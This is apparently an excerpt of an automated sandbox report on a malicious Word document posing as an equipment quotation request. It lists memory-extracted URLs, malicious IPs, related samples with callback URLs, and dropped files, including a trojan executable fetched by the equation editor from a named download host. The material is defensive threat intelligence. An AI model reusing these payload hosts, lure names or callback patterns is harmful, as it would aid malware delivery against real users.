https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2	explorer.exe, 00000006.00000000.2122869349.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.2115552459.0000000004263000.00000004.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.t-online.de/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000006.00000000.2122657070.000000000839A000.00000004.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000006.00000000.2126479275.000000000A330000.00000008.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tesco.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.seznam.cz/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://suche.freenet.de/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.interpark.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.ipop.co.kr/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://investor.msn.com/	mpomboby8423.exe, 00000004.00000002.2104552065.0000000000B30000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2113776918.0000000003C40000.00000002.00000001.sdmp	false		high
http://search.espn.go.com/	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://www.myspace.com/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://search.centrum.cz/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false		high
http://p.zhongsou.com/favicon.ico	explorer.exe, 00000006.00000000.2127067427.000000000A3E9000.00000008.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
92.119.114.220	unknown	Ukraine		204601	ON-LINE-DATAServerlocation-NetherlandsDrontenNL	true
91.195.240.94	unknown	Germany		47846	SEDO-ASDE	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	339299
Start date:	13.01.2021
Start time:	20:36:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@10/8@3/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 27.4% (good quality ratio 26%) Quality average: 76.6% Quality standard deviation: 28.5%
HCA Information:	Successful, ratio: 98% Number of executed functions: 93 Number of non-executed functions: 100
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:36:44	API Interceptor	187x Sleep call for process: EQNEDT32.EXE modified
20:36:48	API Interceptor	33x Sleep call for process: mpomboby8423.exe modified
20:37:04	API Interceptor	149x Sleep call for process: help.exe modified
20:37:59	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
91.195.240.94	PO#218740.exe	Get hash	malicious	Browse	www.atypicaldesigncollective.com/wpsb/?Wxo=7nVneewqAZB/aftRijb2AYl2HcKbMlcArpJ1Vm/P20XaJXjQGY4QEDBLruT4Dk62NMvB&vB=lhv8
	Consignment Details.exe	Get hash	malicious	Browse	www.covicio.com/h3qo/?XvLhT=L8rdGtX8cj&K8b4v=OddLokl31qshFyWlyQEIcVDu0pAizKjoKxsWslvKSNLFFj/yIE9+GRG/HaxRm8+xLwnE
	Purchase Order -263.exe	Get hash	malicious	Browse	www.findmafia.com/n925/?jzuPNj=xuK0umGZqRSssiyTWB5PD2gV4XB3nq++hz/B9PiFwF5vik7/dd9PhqS/Ff7Fsejy2lMX&8p=_jAPiL
	Pending PURCHASE ORDER - 47001516.pdf.exe	Get hash	malicious	Browse	www.areralind.com/iic6/?u4ThA=cjlh2bLhQXW4VlC&MZQL=DoV7cEYQMmd7VxVpFw3yWAvm+e4DwTKM6ez4HiOjEpQ1Fk/Pb5v3dzoCBKvMyVMsONTa
	order no. 3643.exe	Get hash	malicious	Browse	www.promotionalplacements.com/0wdn/?Bl=jmYaOKlr+2FfAeZahyaTAMJRjN0ako2uRB7ye7tFiJ41vzJNH4E+JCCo9bj1vuPP2YbX&QzuP3V=KfvDIX0H
	Details!!!!.exe	Get hash	malicious	Browse	www.bowvacare.com/t052/?M6q=06P2zHFBNwkKcjxMW0ZYnVSUrZOYMIqYn0jW4t9Sv865mvbN3fk+T6GUQHx6WgnVjsEH&q48=Gbthj2r8e
	ORDER 172IKL0153094.exe	Get hash	malicious	Browse	www.promotionalplacements.com/0wdn/?4h3=jmYaOKlr+2FfAeZahyaTAMJRjN0ako2uRB7ye7tFiJ41vzJNH4E+JCCo9bv18+DMvIbBTiiRsA==&vR-TR=LJEtYNu
	siYRtE23mD.exe	Get hash	malicious	Browse	www.type3cannabis.com/oj6t/?ojrXP=kqMYwQk82t2T1Lt8pU6YEmj/eoYCnhRMTPksyGfrTy2ILdLjMrXXGK4BNP2S2VSRUoMu&KN6p=FVplxlNplH1p8Zd
	PRODUCT INQUIRY BNQ1.xlsx	Get hash	malicious	Browse	www.mypetwellnessstore.com/coz3/?RFN4=ajqb1vM6sB/4IAKhvG3/c5mVsBLkf/xD4kRwCEIdAqloaMXfIV7wZTIJ/T39KnARMqvxIw==&RB=NL00JzKhBv9HkNRp
	STATEMENT NOV20.xlsx	Get hash	malicious	Browse	www.monetizemybizadvertisers.com/ogg/?TD=oP2tstFPZDvxz0&MBZ8xB=g8xKdXZufOnEIPV2KjWZylhEF0u3+INtUX5rBLROJ4vaYn14A+wO7JT1W6f+JZrPnVjFLw==
	New Additional Agreement.exe	Get hash	malicious	Browse	www.owner.codes/bw82/?J2JxbNH=7PTVdedASbqXwdeJ7Nsx6Z4+deFvCf6zRKQ0g09ISedI/B2MYyGtMzQZmx0vvrAl+DVW&BXEpz=Z2Jd8XTPeT
	Additional Agreement 2020-KYC.exe	Get hash	malicious	Browse	www.owner.codes/bw82/?K4k0=7PTVdedASbqXwdeJ7Nsx6Z4+deFvCf6zRKQ0g09ISedI/B2MYyGtMzQZmx0vvrAl+DVW&dDH=P0GPezWpdVGtah
	Additional Agreement 2020-KYC.exe	Get hash	malicious	Browse	www.beauskitchen.com/bw82/?RR=L++B11gAAOUjb7FCpgjqLOCb3aeUZtTuQ2/xcMSvZ8K7RWmMRTDMsQHRNHFTLEUTkmC2R4zrOw==&E6A=8pMPQv
	mFNIsJZPe2.exe	Get hash	malicious	Browse	www.beauskitchen.com/bw82/?tHrp=9r7HOjb8jFFtz&sBZXxj6=L++B11gAAOUjb7FCpgjqLOCb3aeUZtTuQ2/xcMSvZ8K7RWmMRTDMsQHRNEppIF4onRjn
	Additional Agreement 2020-KYC.exe	Get hash	malicious	Browse	www.owner.codes/bw82/?elX=7PTVdedASbqXwdeJ7Nsx6Z4+deFvCf6zRKQ0g09ISedI/B2MYyGtMzQZmyU/gKQdgm8R&uVj0=M494u
	AWB# 9284730932.exe	Get hash	malicious	Browse	www.progressionglobaleducation.com/o9bs/?JfELt4Gh=e2WuzP2KL7Qag3Mk7Lwr0NOS4E7DIhoQd6IjkNRlnbrRjVPd72EWKLDkHxRcUFIv776Y&ojq0d=SzuPdV
	DEWA PROJECT 12100317.exe	Get hash	malicious	Browse	www.beauskitchen.com/bw82/?Sh=L++B11gAAOUjb7FCpgjqLOCb3aeUZtTuQ2/xcMSvZ8K7RWmMRTDMsQHRNEpDX1IojTrn&RZB=dnrxRrdHFPe8sx
	HussanCrypted.exe	Get hash	malicious	Browse	www.cleo.vision/cia6/?T8eD=Q6D9YgNFyKyA4HKU1w92ahXplO0nGtsIjLqzul1Tx979rO99WlQEjhbEVqJR4QMaoqe0&-ZSD=1b0hlT
	OD-14102020 PDF.exe	Get hash	malicious	Browse	www.antepsarayi.com/ian/?OjN0X=YqujN5NNKTKJ4IQKy0GvxKse8tEykRuk5KTVF3//lhxgKXTH6gN0X1UV9ItiZ3Ki3iv0&TT=fbdDrHkHTjTdv
	New Purchase Order 501,689$.exe	Get hash	malicious	Browse	www.rogue.football/eao/?nfut_N=xPJt_Tlp9&hBZpUr88=GXcCeT3dTLskHq1w4dACRNsMvw58Ngsv/7gwz0YNRjhVragPzz2df73QPkmjIOjoyjYZ

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ON-LINE-DATAServerlocation-NetherlandsDrontenNL	SecuriteInfo.com.Generic.mg.15368412abd71685.exe	Get hash	malicious	Browse	185.206.215.56
	QL-0217.doc	Get hash	malicious	Browse	185.206.215.56
	RT-05723.exe	Get hash	malicious	Browse	185.206.215.56
	RT-05723.doc	Get hash	malicious	Browse	185.206.215.56
	PIO-06711.doc	Get hash	malicious	Browse	185.206.215.56
	gbZmk9Q9Ea.exe	Get hash	malicious	Browse	45.88.107.210
	6Cprm97UTl.xls	Get hash	malicious	Browse	185.206.215.56
	http://d4a687ce4c.lazeruka.ru	Get hash	malicious	Browse	91.211.251.72
	New order.doc	Get hash	malicious	Browse	92.119.113.115
	Purchase order.doc	Get hash	malicious	Browse	92.119.113.115
	PO20-AE12-0023.doc	Get hash	malicious	Browse	92.119.113.140
	ES-MA-18-9 4130.doc	Get hash	malicious	Browse	92.119.113.140
	Order-list.doc	Get hash	malicious	Browse	92.119.113.140
	Launcher.exe	Get hash	malicious	Browse	185.92.148.230
	UXsGbxVc2I.rtf	Get hash	malicious	Browse	92.119.113.115
	Documents.doc	Get hash	malicious	Browse	92.119.113.115
	http://clcktut.work/public/8852102841203823	Get hash	malicious	Browse	45.82.69.137
	Vlpuoe2JSz.exe	Get hash	malicious	Browse	45.147.197.185
	PI.xlsx	Get hash	malicious	Browse	45.147.197.185
	PO#181120_pdf.exe	Get hash	malicious	Browse	92.119.113.115
SEDO-ASDE	PO#218740.exe	Get hash	malicious	Browse	91.195.240.94
	cGLVytu1ps.exe	Get hash	malicious	Browse	91.195.241.137
	AOA4sx8Z7l.exe	Get hash	malicious	Browse	91.195.241.137
	Doc_74657456348374.xlsx.exe	Get hash	malicious	Browse	91.195.241.137
	Consignment Details.exe	Get hash	malicious	Browse	91.195.240.94
	Shipping Documents PL&BL Draft.exe	Get hash	malicious	Browse	91.195.241.137
	Purchase Order -263.exe	Get hash	malicious	Browse	91.195.240.94
	zz4osC4FRa.exe	Get hash	malicious	Browse	91.195.241.137
	btVnDhh5K7.exe	Get hash	malicious	Browse	91.195.241.137
	4wCFJMHdEJ.exe	Get hash	malicious	Browse	91.195.241.137
	SecuriteInfo.com.Trojan.Inject4.6535.29715.exe	Get hash	malicious	Browse	91.195.241.137
	Pending PURCHASE ORDER - 47001516.pdf.exe	Get hash	malicious	Browse	91.195.240.94
	SKM_C258201001130020005057.exe	Get hash	malicious	Browse	91.195.241.137
	order no. 3643.exe	Get hash	malicious	Browse	91.195.240.94
	Details!!!!.exe	Get hash	malicious	Browse	91.195.240.94
	rtgs_pdf.exe	Get hash	malicious	Browse	91.195.241.137
	http://walmartprepaid.com	Get hash	malicious	Browse	91.195.240.136
	P.O-45.exe	Get hash	malicious	Browse	91.195.241.137
	order FTH2004-005.exe	Get hash	malicious	Browse	91.195.241.137
	invv.exe	Get hash	malicious	Browse	91.195.241.137

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mpomabiva[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	333824
Entropy (8bit):	7.6392134738851505
Encrypted:	false
SSDEEP:	6144:sr1I5DbAQcHAORYANc2wPYShrCT1X9ZpKltQzUvrYbdw3CK:Q1I5fAPHtwdWTvZAQoYCP
MD5:	06AAFD2382D63AFC9874125E5C1062B0
SHA1:	E3B553368EEC14EA84BA32F291A17DC614C64670
SHA-256:	92420EBD5FEEB4171DB8A4877AC6EB2DD594FD4D07192408B26AA9B98C5D048D
SHA-512:	CD317DF3B6F9B86E3B3C2EEF38D5B4FB8900562AAE920C08607075FE6FD3E01480035F6FFB4188CAE49C37FAEBD6ED626A2DA457C75D99BA1535A42D2A690B27
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Reputation:	low
IE Cache URL:	http://vm1662026.3ssd.had.wf/mpomabiva.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tj.m'j.m'j.m'.Q.'k.m'.4.'I.m'.4.'r.m'.4.'..m'j.l'..m'...'..m'M7.'k.m'M7.'k.m'M7.'k.m'Richj.m'................PE..L...E.._.................n........................@.......................................@..........................................P..x....................p..P.......................................@............................................text....m.......n.................. ..`.rdata...d.......f...r..............@..@.data....P.......4..................@....rsrc...x....P......................@..@.reloc.......p.......(..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1E842130-90B9-4F45-8DA5-C9F08E2C2850}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7621A4C2-B642-4F8D-86CD-93AA6D767CE8}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	7342
Entropy (8bit):	3.4430552284858305
Encrypted:	false
SSDEEP:	192:XTZWwdTPSxSqkH6rTqL1Y5LnCDUi+s291Tliysb+93xNRvBiD:lWwZpqE6rOZAnLi+s2TlXssbBiD
MD5:	DB69A1851F60B6019CC16357C786F4DE
SHA1:	F8C3F584A201D0B2C7B4E86CCE7AF034B2BC2C6A
SHA-256:	84D76E69626BD7AA36995B5ED5370EC4BC3BBC251F4AD38962D2E2A2C13BB177
SHA-512:	6944927FA2465E94E6ADC23151D4BD39762774F93FEB0542E8A1834908E6A029CC6A93972DC86A257201580B3CF26D2F15AA301780CA9A4D7F090AC9ADE61BBE
Malicious:	false
Reputation:	low
Preview:	?.:.?.`./...!._.).-.~.@.%.:.?.?._...+.?.9.5.,.2.`.6.#.:.).>.?.>.?.?...#..\|.+.:.?.`.~.\|.2.~.....6.!.3.0.!.].(.%.%..~.;.@.?.?.?.).=.8.@.8.%.%.>.6...(.[.(.[...?.$.../.0...>.5.-.:.?.5.0.].?.+.5._.....).?.5.:.(.6.4.+.3.....=.9.8.5...$.?.\|.1.(.;.1.?.\|._.,.>.+.+..._.[.4.8.<._.%.@.0.>.~./.).#.^.^.?...+.,...;.~.1.%.6.,.%.:.8...[.~.>./.^.?.8.2.'.7....?.?.>.).<.=...7.!.2.,.%.'.;.].[.5.?...[.?.[.-./...=...?.^.5.\|.+._.>.&.6.8.@.\|...[.>.,...&.?.,.&.^.!.,.(.?...,.0.=.&.5._.-.^.`.%.3.2.?...`.,.[.=.$.3.%.<.?.7.?...$.'.:...%.~.+.+./.9.<.;.2..6.\|.#.^.2.=.-.1.?.).?.(.'.1.\|...;.\|.?.$.8.8.@.0.-.@.?.-.&.%.[.>.(.9.3.4.5.4.;.../.4.<.?.@.?.7...,.?.$.>...1.8.~.!.9...%.?.6.[.>.`._....,.$.!.1.-.2.9.@.7.~.1.!.,...>.;.._.#.=.4.%.\|.(.#.6.4.:.?.6.?.(.^.;.=.?.^.=..3.....`.../.?.?./.....>.3.?._.?.`.%.,.'.;.%.9...\|.?.%.].?..8.(.\|.+.`.3.[.'.?.+.8.>.1.\|.,.(.?.4.<...&.-.%.?.[.%.8.?.?.,.%.=.=.1.?.?.9..._.@.(.?.8..?.;.&./.'.4.3.?.).?.~.$.%.5..(.[.?.....~.4.3._.0.+...8...`.6.?.....].?.`.5.+.?.<.4.4.[.?.<.).+...6.).8.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Thu Jan 14 03:36:37 2021, length=1323990, window=hide
Category:	dropped
Size (bytes):	2398
Entropy (8bit):	4.58747666562162
Encrypted:	false
SSDEEP:	48:8TD/XT3IkqYp4JHNph8Qh2TD/XT3IkqYp4JHNph8Q/:8TD/XLIkPp4JNph8Qh2TD/XLIkPp4JNH
MD5:	AD487D48B73A9F82C2F3AC847B13A49B
SHA1:	3B7C540839DB5130CFA0AA5599EEEA943D8A2CBD
SHA-256:	A25FD54F42AED2422F9681D37ADD2F0453D606284D731040CAC94B06A0F6BB9D
SHA-512:	E968FA26D0A19890A9C665129319CA1D22CFC2397361DCB71E1D56394A3F595D87EB1629D7583F51A9DEF602B88EA9AC105B31714C2D54A8661F0F4EFCC5E889
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...8.E..{..8.E..{...........3...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..3...R.$ .RFQRAT~1.DOC..........Q.y.Q.y...8.....................R.F.Q. .R.A.T.E.D. .P.O.W.E.R. .2.0.0.0.H.P.-. .O.T.H.E.R.S.P.E.C.I.F.I.C.A.T.I.O.N...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.doc.J.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.F.Q. .R.A.T.E.D. .P.O.W.E.R. .2.0.0.0.H.P.-. .O.T.H.E.R.S.P.E.C.I.F.I.C.A.T.I.O.N...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.7528033330948745
Encrypted:	false
SSDEEP:	3:M1IZQVVZ1L9LTSvKQVVZ1L9LTSmX1IZQVVZ1L9LTSv:MPVv3GtVv3XVv3c
MD5:	02635CE17E45C4F9008EDCDB73B2407B
SHA1:	FCB5F7EBCD0870B67A3187CC12875DC4D9D3CC70
SHA-256:	B410A5D58D9724095357F1DFB471CE4B84275AB0C5671C945A61C4E4EAC19D61
SHA-512:	130F115757BC058DB19E3A7A93F9EA74F7F5F7E4DD0E772BE49C048BC78FB869ED7166FBC5DFBDC9F8BF32C63193782278FF852D85F30D80F6B9CD201FA84A03
Malicious:	false
Reputation:	low
Preview:	[doc]..RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.LNK=0..RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.LNK=0..[doc]..RFQ RATED POWER 2000HP- OTHERSPECIFICATION.docx.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\user\AppData\Roaming\mpomboby8423.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	333824
Entropy (8bit):	7.6392134738851505
Encrypted:	false
SSDEEP:	6144:sr1I5DbAQcHAORYANc2wPYShrCT1X9ZpKltQzUvrYbdw3CK:Q1I5fAPHtwdWTvZAQoYCP
MD5:	06AAFD2382D63AFC9874125E5C1062B0
SHA1:	E3B553368EEC14EA84BA32F291A17DC614C64670
SHA-256:	92420EBD5FEEB4171DB8A4877AC6EB2DD594FD4D07192408B26AA9B98C5D048D
SHA-512:	CD317DF3B6F9B86E3B3C2EEF38D5B4FB8900562AAE920C08607075FE6FD3E01480035F6FFB4188CAE49C37FAEBD6ED626A2DA457C75D99BA1535A42D2A690B27
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Reputation:	low
